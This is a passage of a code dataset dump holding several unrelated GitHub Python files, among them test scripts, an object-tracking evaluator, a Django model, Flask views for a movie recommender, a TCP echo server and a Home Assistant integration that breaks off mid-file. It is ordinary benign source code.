\"martians.sqlite\"\nMY_SQLTABLE = \"First_Hundred\"\n\nHTMLDICT = {'alice - Copie.html': [{'class': ['story'],\n 'contents': '
Once upon a time there were three little sisters; and their names were Elsie, Lacie and Tillie; and they lived at the bottom of a well.',\n                             'source': 'C:\\\\Temp\\\\alice - Copie.html',\n                             'tag': 'p'},\n                            {'class': ['story'],\n                             'contents': '...',\n                             'source': 'C:\\\\Temp\\\\alice - Copie.html',\n                             'tag': 'p'}],\n     'alice.html': [{'class': ['story'],\n                     'contents': 'Once upon a time there were three little sisters; and their names were Elsie, Lacie and Tillie; and they lived at the bottom of a well.',\n                     'source': 'C:\\\\Temp\\\\alice.html',\n                     'tag': 'p'},\n                    {'class': ['story'],\n                     'contents': '...',\n                     'source': 'C:\\\\Temp\\\\alice.html',\n                     'tag': 'p'}]}\n\nHTMLDICT2 = {'alice - Copie.html': [{'class': \"['title']\",\n                                     'contents': 'The Dormouse\\'s '\n                                                 'story',\n                                     'file_index': 0,\n                                     'given_path': 'C:\\\\Temp\\\\alice - Copie.html',\n                                     'href': None,\n                                     'pos_index': 4,\n                                     'tag': 'p'},\n                                    {'class': \"['story']\",\n                                     'contents': 'Once upon a time there '\n                                                 'were three little sisters; and their '\n                                                 'names were Elsie, Lacie and Tillie; and they lived '\n                                                 'at the bottom of a well.',\n                                     'file_index': 0,\n                                     'given_path': 'C:\\\\Temp\\\\alice - Copie.html',\n                                     'href': None,\n                                     'pos_index': 6,\n                                     'tag': 'p'},\n                                    {'class': \"['story']\",\n                                     'contents': '...',\n                                     'file_index': 0,\n                                     'given_path': 'C:\\\\Temp\\\\alice - Copie.html',\n                                     'href': None,\n                                     'pos_index': 10,\n                                     'tag': 'p'}],\n                     'alice.html': [{'class': \"['title']\",\n                                    'contents': 'The Dormouse\\'s '\n                                                'story',\n                                    'file_index': 1,\n                                    'given_path': 'C:\\\\Temp\\\\alice.html',\n                                    'href': None,\n                                    'pos_index': 4,\n                                    'tag': 'p'},\n                                   {'class': \"['story']\",\n                                    'contents': 'Once upon a time there were '\n                                                'three little sisters; and their names were Elsie, Lacie and Tillie; and they lived at the '\n                                                'bottom of a well.',\n                                    'file_index': 1,\n                                    'given_path': 'C:\\\\Temp\\\\alice.html',\n                                    'href': None,\n                                    'pos_index': 6,\n                                    'tag': 'p'},\n                                   {'class': \"['story']\",\n                                    'contents': '...
',\n 'file_index': 1,\n 'given_path': 'C:\\\\Temp\\\\alice.html',\n 'href': None,\n 'pos_index': 10,\n 'tag': 'p'}]}\n\n####################################################################################################\n\ndef test_instruction_typing(input_dict):\n\n print(\"Testing categorizing fields in a nested dictionary...\")\n print(dbhandler.dictfieldnames_to_tuplist(input_dict))\n print(\"The previous line should show a list of tuples describing database fields.\")\n print(\"\")\n \n print(\"Testing categorizing fields in a nested dictionary...\")\n print(dbhandler.dictfields_to_string(input_dict))\n print(\"The previous line should show a tuple of strings describing database fields.\")\n print(\"\")\n \n return None\n\n####################################################################################################\n\ndef test_manipulation(input_dict, sqlfilename, sqltable):\n print(\"Testing table creation from a nested dictionary...\")\n dbhandler.create_table(input_dict, sqlfilename, sqltable)\n print(\"\")\n \n print(\"Testing data insertion in database...\")\n dbhandler.add_dbrows(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n print(\"\")\n\n print(\"Testing simple key comparison between a dictionary and a database created from that same dictionary...\")\n dbhandler.compare_keysonly(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing simple key comparison between a dictionary and a database created from another dictionary...\")\n dbhandler.compare_keysonly(MY_DICTALT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing full key comparison between a dictionary and a database created from that same dictionary...\")\n dbhandler.compare_keysfull(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing full key comparison between a dictionary and a database created from another dictionary...\")\n dbhandler.compare_keysfull(MY_DICTALT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing row comparison between a dictionary and a database created from that same dictionary...\")\n dbhandler.compare_rowsfull(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing row comparison between a dictionary and a database created from another dictionary...\")\n dbhandler.compare_rowsfull(MY_DICTALT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing updating database from changes in dictionary...\")\n dbhandler.update_dict_to_db(MY_DICTALT, MY_SQLFILENAME, MY_SQLTABLE)\n \n return None\n\n####################################################################################################\n\ndef test_structures(input_dict):\n \n print(\"Testing conversion of a structure of the form dictionary → list to dictionary → dictionary\")\n converted = structures.dictlist_to_dictdict(input_dict)\n pprint.pprint(converted)\n print(\"\")\n\n print(\"Testing conversion of a structure of the form dictionary → list to dictionary → dictionary,\")\n print(\"while changing the key\")\n converted = structures.dictlist_to_dictdict(input_dict, \"tag\")\n pprint.pprint(converted)\n print(\"\")\n\n print(\"Flattening a structure of the form dictionary → dictionary → dictionary to dictionary → dictionary\")\n flattened = structures.flatten_dictdictdict(converted)\n pprint.pprint(flattened)\n print(\"\")\n \n return None\n\n####################################################################################################\n# RUN ALL TESTS\n####################################################################################################\n## Uncomment to test:\n\n## Test actual 
script\n#pprint.pprint(main.main(\"\"))\nmain.main(\"\")\n\n# htmlparser.py tests\nALICE = \"alice.html\"\n#test_find_all_classes(ALICE)\n#test_find_all_tags(ALICE)\n#test_extract_tags_classes_exact(ALICE,\"p\",\"story\")\n#test_extract_tags_classes_approximate(ALICE,\"p\",\"tory\")\n\n# main.py tests\n#test_main()\n\n# filegenerator.py tests\n#test_filegenerator()\n#filegenerator.htmldict_to_css(HTMLDICT2, \"output.html\")\n\n# userinput.py tests\n#test_userinput()\n\n# dbhandler.py tests\n#test_instruction_typing(MY_DICT)\n#test_manipulation(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n\n# structures.py tests\n#test_structures(HTMLDICT)\n#test_structures(HTMLDICT2)\n\n","repo_name":"josegarban/htmlcopier","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":17656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29826323172","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport os\nimport cv2\nimport torch\nimport numpy as np\n\nfrom pysot.core.config import cfg\nfrom pysot.models.utile_tctrack.model_builder import ModelBuilder_tctrack\nfrom pysot.models.utile_tctrackplus.model_builder import ModelBuilder_tctrackplus\nfrom pysot.tracker.tctrack_tracker import TCTrackTracker\nfrom pysot.tracker.tctrackplus_tracker import TCTrackplusTracker\nfrom pysot.utils.bbox import get_axis_aligned_bbox\nfrom pysot.utils.model_load import load_pretrain\nfrom toolkit.datasets import DatasetFactory\n\n\nparser = argparse.ArgumentParser(description='TCTrack tracking')\nparser.add_argument('--dataset', default='OTB100',type=str,\n help='datasets')\nparser.add_argument('--tracker_name', default='TCTrack', type=str,\n help='tracker name')\nparser.add_argument('--snapshot', default='./tools/snapshot/checkpoint00_e88.pth', type=str,\n help='snapshot of models to eval')\nparser.add_argument('--video', default='', type=str,\n help='eval one special video')\nparser.add_argument('--vis', default='',action='store_true',\n help='whether visualzie result')\nargs = parser.parse_args()\n\ntorch.set_num_threads(1)\n\ndef main():\n# load config\n if args.tracker_name==\"TCTrack\":\n if args.dataset in ['UAV123','UAV123_10fps','DTB70']:\n cfg.merge_from_file(os.path.join('./experiments', args.tracker_name, 'config.yaml'))\n else:\n cfg.merge_from_file(os.path.join('./experiments', args.tracker_name, 'config_l.yaml'))\n # create model\n model = ModelBuilder_tctrack('test')\n\n # load model\n model = load_pretrain(model, args.snapshot).cuda().eval()\n\n # build tracker\n tracker = TCTrackTracker(model)\n hp=[cfg.TRACK.PENALTY_K,cfg.TRACK.WINDOW_INFLUENCE,cfg.TRACK.LR]\n \n elif args.tracker_name==\"TCTrack++\":\n cfg.merge_from_file(os.path.join('./experiments', args.tracker_name, 'config.yaml'))\n # create model\n model = ModelBuilder_tctrackplus('test')\n\n # load model\n model = load_pretrain(model, args.snapshot).cuda().eval()\n\n # build tracker\n tracker = TCTrackplusTracker(model)\n hp=getattr(cfg.HP_SEARCH_TCTrackpp_offline,args.dataset)\n \n else:\n print('No such tracker')\n \n \n cur_dir = os.path.dirname(os.path.realpath(__file__))\n \n dataset_root = os.path.join(cur_dir, '../test_dataset', args.dataset)\n \n\n # create dataset\n dataset = DatasetFactory.create_dataset(name=args.dataset,\n dataset_root=dataset_root,\n load_img=False)\n\n model_name = args.tracker_name\n\n for v_idx, video in 
enumerate(dataset):\n if args.video != '':\n # test one special video\n if video.name != args.video:\n continue\n toc = 0\n pred_bboxes = []\n scores = []\n track_times = []\n for idx, (img, gt_bbox) in enumerate(video):\n tic = cv2.getTickCount()\n if idx == 0:\n cx, cy, w, h = get_axis_aligned_bbox(np.array(gt_bbox))\n gt_bbox_ = [cx-(w-1)/2, cy-(h-1)/2, w, h]\n tracker.init(img, gt_bbox_)\n pred_bbox = gt_bbox_\n scores.append(None)\n if 'VOT2018-LT' == args.dataset:\n pred_bboxes.append([1])\n else:\n pred_bboxes.append(pred_bbox)\n else:\n outputs = tracker.track(img,hp)\n pred_bbox = outputs['bbox']\n pred_bboxes.append(pred_bbox)\n scores.append(outputs['best_score'])\n toc += cv2.getTickCount() - tic\n track_times.append((cv2.getTickCount() - tic)/cv2.getTickFrequency())\n if idx == 0:\n cv2.destroyAllWindows()\n if args.vis and idx > 0:\n gt_bbox = list(map(int, gt_bbox))\n pred_bbox = list(map(int, pred_bbox))\n cv2.rectangle(img, (gt_bbox[0], gt_bbox[1]),\n (gt_bbox[0]+gt_bbox[2], gt_bbox[1]+gt_bbox[3]), (0, 255, 0), 3)\n cv2.rectangle(img, (pred_bbox[0], pred_bbox[1]),\n (pred_bbox[0]+pred_bbox[2], pred_bbox[1]+pred_bbox[3]), (0, 255, 255), 3)\n cv2.putText(img, str(idx), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n cv2.imshow(video.name, img)\n cv2.waitKey(1)\n toc /= cv2.getTickFrequency()\n # save results\n\n model_path = os.path.join('results', args.dataset, model_name)\n if not os.path.isdir(model_path):\n os.makedirs(model_path)\n result_path = os.path.join(model_path, '{}.txt'.format(video.name))\n with open(result_path, 'w') as f:\n for x in pred_bboxes:\n f.write(','.join([str(i) for i in x])+'\\n')\n print('({:3d}) Video: {:12s} Time: {:5.1f}s Speed: {:3.1f}fps'.format(\n v_idx+1, video.name, toc, idx / toc))\n\nif __name__ == '__main__':\n main()\n","repo_name":"vision4robotics/TCTrack","sub_path":"tools/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"52"} +{"seq_id":"23393825609","text":"import numpy as np\n\ndef alignChannels(red, green, blue):\n \"\"\"Given 3 images corresponding to different channels of a color image,\n compute the best aligned result with minimum abberations\n\n Args:\n red, green, blue - each is a HxW matrix corresponding to an HxW image\n\n Returns:\n rgb_output - HxWx3 color image output, aligned as desired\"\"\"\n \n disp_max = 30 #maximum displacement\n [rows,cols] = [red.shape[0],red.shape[1]]\n rgb_mat = np.zeros((rows,cols,3),'uint8') #Initialize matrix for imposing RGB layers on top of each other\n \n #compute SSD to find error between two color intensities\n def ssdCalc(colr1,colr2):\n ssd_err = ((colr1-colr2)**2).sum()\n \n return ssd_err\n \n #find the minimum error by trying out all the possible combinations\n def errorTest(colr1,colr2):\n min_row = 0\n min_col = 0\n errInit = ssdCalc(colr1,colr2) #find the error of the original matrices\n \n #displace row and column to compare the error to original ssd error\n for row in range(-disp_max,disp_max):\n for col in range(-disp_max,disp_max):\n new_colr2 = np.roll(colr2,[row,col],axis = [0,1])\n err_disp = ssdCalc(colr1,new_colr2) #find the ssd error for the new shifted array\n \n if err_disp < errInit:\n errInit = err_disp\n min_row = row\n min_col = col\n \n return [min_row,min_col]\n \n #function to update the values of the rgb matrix\n def rgbUpdate(colr1,colr2,colrIndex):\n [min_error_row,min_error_col] = errorTest(colr1,colr2)\n colr_new = 
np.roll(colr2,[min_error_row,min_error_col],axis = [0,1])\n rgb_mat[...,colrIndex] = colr_new\n \n return rgb_mat\n \n rgb_mat[...,0] = red\n rgb_mat = rgbUpdate(red,blue,2)\n rgb_mat = rgbUpdate(red,green,1)\n\n return rgb_mat","repo_name":"mishra39/16720_ComputerVision","sub_path":"hw0/hw0/code/alignChannels.py","file_name":"alignChannels.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74594811684","text":"v1 = int(input())\nv2 = list(map(int, input().split()))\nqueda = 0 \n\nfor i in range(1, v1):\n if (v2[i] < v2[i-1]):\n queda = i + 1\n break\n\nprint(f'{queda}')","repo_name":"bernardovvieira/algoritmos_e_programacao","sub_path":"13-04-2022/b2167.py","file_name":"b2167.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11368546625","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Item(models.Model):\n STATUS_CHOICES = (\n ('pending', 'Pending'),\n ('done', 'Done'),\n ('cancelled', 'Cancelled')\n )\n user = models.ForeignKey(User)\n name = models.CharField(max_length=255)\n status = models.CharField(max_length=9, choices=STATUS_CHOICES, default='pending')\n due_date = models.DateTimeField(null=True)\n date_created = models.DateField(editable=True)\n date_modified = models.DateField(editable=True)\n #date_created = models.DateTimeField(editable=True)\n #date_modified = models.DateTimeField(editable=True)\n\n","repo_name":"raineaway/260_final_project","sub_path":"lists/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24499859549","text":"#!/usr/bin/env python3\n\nclass MMGenObject(object):\n\t'placeholder - overridden when testing'\n\tdef immutable_attr_init_check(self): pass\n\nimport os\nif os.getenv('MMGEN_DEBUG') or os.getenv('MMGEN_TEST_SUITE') or os.getenv('MMGEN_TRACEBACK'):\n\n\timport sys,re,traceback,json,pprint\n\tfrom decimal import Decimal\n\tfrom difflib import unified_diff,ndiff\n\n\tdef pmsg(*args,out=sys.stderr):\n\t\td = args if len(args) > 1 else '' if not args else args[0]\n\t\tout.write(pprint.PrettyPrinter(indent=4).pformat(d) + '\\n')\n\tdef pdie(*args,exit_val=1,out=sys.stderr):\n\t\tpmsg(*args,out=out)\n\t\tsys.exit(exit_val)\n\tdef pexit(*args,out=sys.stderr):\n\t\tpdie(*args,exit_val=0,out=out)\n\n\tdef Pmsg(*args):\n\t\tpmsg(*args,out=sys.stdout)\n\tdef Pdie(*args):\n\t\tpdie(*args,out=sys.stdout)\n\tdef Pexit(*args):\n\t\tpexit(*args,out=sys.stdout)\n\n\tdef print_stack_trace(message=None):\n\t\ttb1 = traceback.extract_stack()\n\t\ttb2 = [t for t in tb1 if t.filename[:1] != '<'][2:-2]\n\t\tsys.stderr.write('STACK TRACE {}:\\n'.format(message or '(unnamed)'))\n\t\tfs = ' {}:{}: in {}:\\n {}\\n'\n\t\tfor t in tb2:\n\t\t\tfn = re.sub(r'^\\./','',os.path.relpath(t.filename))\n\t\t\tfunc = t.name+'()' if t.name[-1] != '>' else t.name\n\t\t\tsys.stderr.write(fs.format(fn,t.lineno,func,t.line or '(none)'))\n\n\tclass MMGenObject(object):\n\n\t\t# Pretty-print any object subclassed from MMGenObject, recursing into sub-objects - WIP\n\t\tdef pmsg(self):\n\t\t\tprint(self.pfmt())\n\t\tdef pdie(self):\n\t\t\tprint(self.pfmt())\n\t\t\tsys.exit(1)\n\t\tdef pfmt(self,lvl=0,id_list=[]):\n\t\t\tscalars = (str,int,float,Decimal)\n\t\t\tdef 
do_list(out,e,lvl=0,is_dict=False):\n\t\t\t\tout.append('\\n')\n\t\t\t\tfor i in e:\n\t\t\t\t\tel = i if not is_dict else e[i]\n\t\t\t\t\tif is_dict:\n\t\t\t\t\t\tout.append('{s}{:<{l}}'.format(i,s=' '*(4*lvl+8),l=10,l2=8*(lvl+1)+8))\n\t\t\t\t\tif hasattr(el,'pfmt'):\n\t\t\t\t\t\tout.append('{:>{l}}{}'.format('',el.pfmt(\n\t\t\t\t\t\t\tlvl=lvl+1,id_list=id_list+[id(self)]),l=(lvl+1)*8))\n\t\t\t\t\telif isinstance(el,scalars):\n\t\t\t\t\t\tif isList(e):\n\t\t\t\t\t\t\tout.append('{:>{l}}{:16}\\n'.format('',repr(el),l=lvl*8))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tout.append(' {}'.format(repr(el)))\n\t\t\t\t\telif isList(el) or isDict(el):\n\t\t\t\t\t\tindent = 1 if is_dict else lvl*8+4\n\t\t\t\t\t\tout.append('{:>{l}}{:16}'.format('','<'+type(el).__name__+'>',l=indent))\n\t\t\t\t\t\tif isList(el) and isinstance(el[0],scalars):\n\t\t\t\t\t\t\tout.append('\\n')\n\t\t\t\t\t\tdo_list(out,el,lvl=lvl+1,is_dict=isDict(el))\n\t\t\t\t\telse:\n\t\t\t\t\t\tout.append('{:>{l}}{:16} {}\\n'.format(\n\t\t\t\t\t\t\t'','<'+type(el).__name__+'>',repr(el),l=(lvl*8)+8))\n\t\t\t\t\tout.append('\\n')\n\t\t\t\tif not e: out.append('{}\\n'.format(repr(e)))\n\n\t\t\tdef isDict(obj):\n\t\t\t\treturn isinstance(obj,dict)\n\t\t\tdef isList(obj):\n\t\t\t\treturn isinstance(obj,list)\n\t\t\tdef isScalar(obj):\n\t\t\t\treturn isinstance(obj,scalars)\n\n\t\t\tout = ['<{}>{}\\n'.format(type(self).__name__,' '+repr(self) if isScalar(self) else '')]\n\t\t\tif id(self) in id_list:\n\t\t\t\treturn out[-1].rstrip() + ' [RECURSION]\\n'\n\t\t\tif isList(self) or isDict(self):\n\t\t\t\tdo_list(out,self,lvl=lvl,is_dict=isDict(self))\n\n\t\t\tfor k in self.__dict__:\n\t\t\t\te = getattr(self,k)\n\t\t\t\tif isList(e) or isDict(e):\n\t\t\t\t\tout.append('{:>{l}}{:<10} {:16}'.format('',k,'<'+type(e).__name__+'>',l=(lvl*8)+4))\n\t\t\t\t\tdo_list(out,e,lvl=lvl,is_dict=isDict(e))\n\t\t\t\telif hasattr(e,'pfmt') and type(e) != type:\n\t\t\t\t\tout.append('{:>{l}}{:10} {}'.format(\n\t\t\t\t\t\t'',k,e.pfmt(lvl=lvl+1,id_list=id_list+[id(self)]),l=(lvl*8)+4))\n\t\t\t\telse:\n\t\t\t\t\tout.append('{:>{l}}{:<10} {:16} {}\\n'.format(\n\t\t\t\t\t\t'',k,'<'+type(e).__name__+'>',repr(e),l=(lvl*8)+4))\n\n\t\t\timport re\n\t\t\treturn re.sub('\\n+','\\n',''.join(out))\n\n\t\t# Check that all immutables have been initialized. 
Expensive, so do only when testing.\n\t\tdef immutable_attr_init_check(self):\n\t\t\tfrom .globalvars import g\n\t\t\tif g.test_suite:\n\t\t\t\tfrom .util import rdie\n\t\t\t\tcls = type(self)\n\t\t\t\tfor attrname in sorted({a for a in self.valid_attrs if a[0] != '_'}):\n\t\t\t\t\tfor o in (cls,cls.__bases__[0]): # assume there's only one base class\n\t\t\t\t\t\tif attrname in o.__dict__:\n\t\t\t\t\t\t\tattr = o.__dict__[attrname]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\trdie(3,'unable to find descriptor {}.{}'.format(cls.__name__,attrname))\n\t\t\t\t\tif type(attr).__name__ == 'ImmutableAttr':\n\t\t\t\t\t\tif attrname not in self.__dict__:\n\t\t\t\t\t\t\tfs = 'attribute {!r} of {} has not been initialized in constructor!'\n\t\t\t\t\t\t\trdie(3,fs.format(attrname,cls.__name__))\n\n\tdef print_diff(a,b,from_file='',to_file='',from_json=True):\n\t\tif from_json:\n\t\t\ta = json.dumps(json.loads(a),indent=4).split('\\n') if a else []\n\t\t\tb = json.dumps(json.loads(b),indent=4).split('\\n') if b else []\n\t\telse:\n\t\t\ta = a.split('\\n')\n\t\t\tb = b.split('\\n')\n\t\tsys.stderr.write(' DIFF:\\n {}\\n'.format('\\n '.join(unified_diff(a,b,from_file,to_file))))\n\n\tdef get_ndiff(a,b):\n\t\ta = a.split('\\n')\n\t\tb = b.split('\\n')\n\t\treturn list(ndiff(a,b))\n","repo_name":"totaltrader/mmgen","sub_path":"mmgen/devtools.py","file_name":"devtools.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"14385045201","text":"from setuptools import setup, find_packages\nfrom pathlib import Path\n\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\nVERSION = \"0.1.5\"\nDESCRIPTION = (\n \"This package will allow the developer to use an mvc structure in a Flet project.\"\n)\n\n# Setting up\nsetup(\n name=\"flet-mvc\",\n version=VERSION,\n author=\"o0Adrian (C. Adrián Monroy)\",\n author_email=\"\",\n description=DESCRIPTION,\n url=\"https://github.com/o0Adrian/flet-mvc\",\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=find_packages(),\n package_data={\n \"mvc_commands\": [\n \"templates/*\",\n \"templates/*/*\",\n \"templates/*/*/*\",\n ],\n },\n install_requires=[\n \"flet>=0.7.4\",\n \"click>=8.1.3\",\n ],\n keywords=[\n \"mvc\",\n \"flet\",\n \"flet mvc\",\n \"model\",\n \"view\",\n \"controller\",\n \"node\",\n \"datapoint\",\n ],\n entry_points={\n \"console_scripts\": [\n \"flet-mvc=mvc_commands.cli:cli\",\n ],\n },\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ],\n)\n","repo_name":"o0Adrian/flet-mvc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"52"} +{"seq_id":"42300625288","text":"from socket import *\n\nserver_port = 12000\n\n# Create socket\nserver_socket = socket(AF_INET, SOCK_STREAM)\n# Bind welcoming socket to port\nserver_socket.bind((\"\", server_port))\n# Listen for TCP requests. 1 max queued connection.\nserver_socket.listen(1)\n\nprint(\"Ready to recieve.\")\n\nwhile True:\n # accept the connection, complete the handshake. 
Create TCP connection.\n    connection_socket, addr = server_socket.accept()\n    sentence = connection_socket.recv(1024).decode()\n    response_sentence = sentence.upper()\n    connection_socket.send(response_sentence.encode())\n    connection_socket.close()\n    print(\"Received: \", sentence)\n    print(\"Responded: \", response_sentence)","repo_name":"zcribe/Raamatud-Books","sub_path":"kuroseRoss/Chapter 2/TCPServer.py","file_name":"TCPServer.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"72240879844","text":"import sys\nimport math\n\ndef anagram(word):\n    s=math.factorial(len(word))\n    result={}\n    for i in word:\n        if i in result:\n            result[i]+=1\n        else:\n            result[i]=1\n    for j in result:\n        s//=math.factorial(result[j])\n    return s\n\nmat=[] \nfor i in sys.stdin:\n    mat.append(i.strip())\nfor j in mat:\n    print(anagram(j))\n    \n","repo_name":"luna-ortus-cor/CS2040C","sub_path":"kattis_py/anagramcounting.py","file_name":"anagramcounting.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"12211132545","text":"\"\"\"\npurpose: to store the URL endpoints for the front end of our website\n    -- we store the routes (main pages of our website, like login, sign-up, main page, etc)\n    -- import Blueprint means we define this file as a blueprint (it has a bunch of URLs/routes in it)\n\"\"\"\nfrom flask import Blueprint, render_template, request, flash, jsonify\nfrom flask_login import login_required, current_user\nfrom .models import Note, Recommended, IMDB_top_10\nfrom . import db \nfrom google_links_and_posters_BS4 import get_google_1st_link, get_google_page, get_image, compute_three, compute_array\nfrom movieREC_use_model import rec_10, titles_only\nfrom imdb_get_top_ten import get_top_10_imdb\nimport json\n\nviews = Blueprint('views', __name__) # set up a views blueprint for our flask application\n\n\n@views.route('/journal', methods=['GET', 'POST']) # define 1st view (this is a decorator)\n@login_required # 2nd decorator, cannot get to home page without logging in\ndef home():\n    if request.method == 'POST':\n        note = request.form.get('note')\n\n        if len(note) < 1:\n            flash('Note is too short!', category='error')\n        else:\n            new_note = Note(data=note, user_id=current_user.id)\n            db.session.add(new_note)\n            db.session.commit()\n            #flash('Journal entry added!', category='success')\n\n    return render_template(\"journal.html\", user=current_user)\n\n@views.route('/recommend', methods=['GET', 'POST']) # define 2nd view (this is a decorator)\n@login_required # 2nd decorator, cannot get to home page without logging in\ndef recommend():\n    for j in range(15):\n        old_rec = Recommended.query.first()\n        if old_rec:\n            if old_rec.user_id == current_user.id:\n                db.session.delete(old_rec)\n                db.session.commit()\n        else:\n            break\n\n    if request.method == 'POST':\n        user_movie = request.form.get('movie')\n\n        if len(user_movie) < 1:\n            flash('Movie title is too short!', category='error')\n        else:\n            user_movie = user_movie.lower() # make everything lowercase, then capitalize each word\n            user_movie = user_movie.title()\n            try:\n                ten_rec, found_movie = rec_10(user_movie)\n            except:\n                flash('Movie not found:(', category='error')\n                return render_template(\"recommend.html\", user=current_user)\n            recommendations = titles_only(str(ten_rec))\n            results = compute_array(recommendations[:12])\n            x = 1\n            for i, three_links in enumerate(results):\n                link1 = three_links[0]\n                
link2 = three_links[1]\n img_link = three_links[2]\n if img_link == None: # avoid displaying a bad link (no img, void link)\n continue # simply skip to next recommended movie\n title = str(x) + ') ' + str(recommendations[i])\n new_rec = Recommended(data=title, link1=link1, link2=link2, img_link=img_link, user_id=current_user.id)\n db.session.add(new_rec)\n db.session.commit()\n x += 1\n flash('Movie found!', category='success')\n\n found_movie = \"Our recommendations for you for: \" + str(found_movie)\n found_title = Recommended(found_title=found_movie, user_id=current_user.id)\n db.session.add(found_title)\n db.session.commit()\n\n return render_template(\"recommend.html\", user=current_user)\n\n@views.route('/imdb_top_10', methods=['GET', 'POST']) # define 1st view (this is a decorator)\n@login_required # 2nd decorator, cannot get to home pg without loggin in\ndef imdb_top_10():\n top_10 = get_top_10_imdb() # we get an array of 10 movie names back\n results = compute_array(top_10) # imported function, uses threads to run web-scraping concurrently (50 sec --> 4 sec wait time)\n x = 1\n for i, three_links in enumerate(results):\n link1 = three_links[0]\n link2 = three_links[1]\n img_link = three_links[2]\n if img_link == None: # avoid displaying a bad link (no img, void link)\n continue # simply skip to next recommended movie\n movie = str(x) + ') ' + str(top_10[i])\n top_ten_movies = IMDB_top_10(data=str(movie), link1=link1, link2=link2, img_link=img_link, user_id=current_user.id)\n db.session.add(top_ten_movies)\n db.session.commit()\n x += 1\n return render_template(\"imdb_top_10.html\", user=current_user)\n\n@views.route('/delete-note', methods=['POST'])\ndef delete_note():\n note = json.loads(request.data) # turn our data into a python dictionary object\n noteId = note['noteId']\n note = Note.query.get(noteId)\n if note:\n if note.user_id == current_user.id:\n db.session.delete(note)\n db.session.commit()\n\n return jsonify({}) # turn the dictionary into a json object (we don't need the dict, but a return is a must)\n","repo_name":"colinZejda/Movie_recommender_knn_model","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37559876800","text":"\"\"\"A wrapper 'hub' for the Litter-Robot API and base entity for common attributes.\"\"\"\nfrom datetime import time, timedelta\nimport logging\nfrom types import MethodType\nfrom typing import Any, Optional\n\nimport pylitterbot\nfrom pylitterbot.exceptions import LitterRobotException, LitterRobotLoginException\n\nfrom homeassistant.const import CONF_PASSWORD, CONF_USERNAME\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.event import async_call_later\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\nimport homeassistant.util.dt as dt_util\n\nfrom .const import DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\nREFRESH_WAIT_TIME = 12\nUPDATE_INTERVAL = 10\n\n\nclass LitterRobotHub:\n \"\"\"A Litter-Robot hub wrapper class.\"\"\"\n\n def __init__(self, hass: HomeAssistant, data: dict):\n \"\"\"Initialize the Litter-Robot hub.\"\"\"\n self._data = data\n self.account = None\n self.logged_in = False\n\n async def _async_update_data():\n \"\"\"Update all device states from the Litter-Robot API.\"\"\"\n await self.account.refresh_robots()\n return True\n\n self.coordinator = DataUpdateCoordinator(\n hass,\n _LOGGER,\n 
